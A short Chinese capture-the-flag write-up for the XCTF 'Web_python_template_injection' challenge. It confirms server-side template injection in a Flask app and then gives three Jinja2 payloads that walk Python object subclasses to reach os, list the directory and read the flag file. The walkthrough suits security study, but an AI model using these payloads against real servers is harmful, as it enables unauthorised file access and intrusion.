当前位置:   article > 正文

[wp] 攻防世界 Web_python_template_injection_xctf python template injection

xctf python template injection

在这里插入图片描述
7*7变成49了,应该存在模板注入

{{''.__class__.__mro__[2].__subclasses__()}}
  • 1

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
  • 1

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
  • 1

在这里插入图片描述
从零学习flask模板注入
原理在这位师傅的文章里已经写的很详细啦

本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/809708
推荐阅读
相关标签
  

闽ICP备14008679号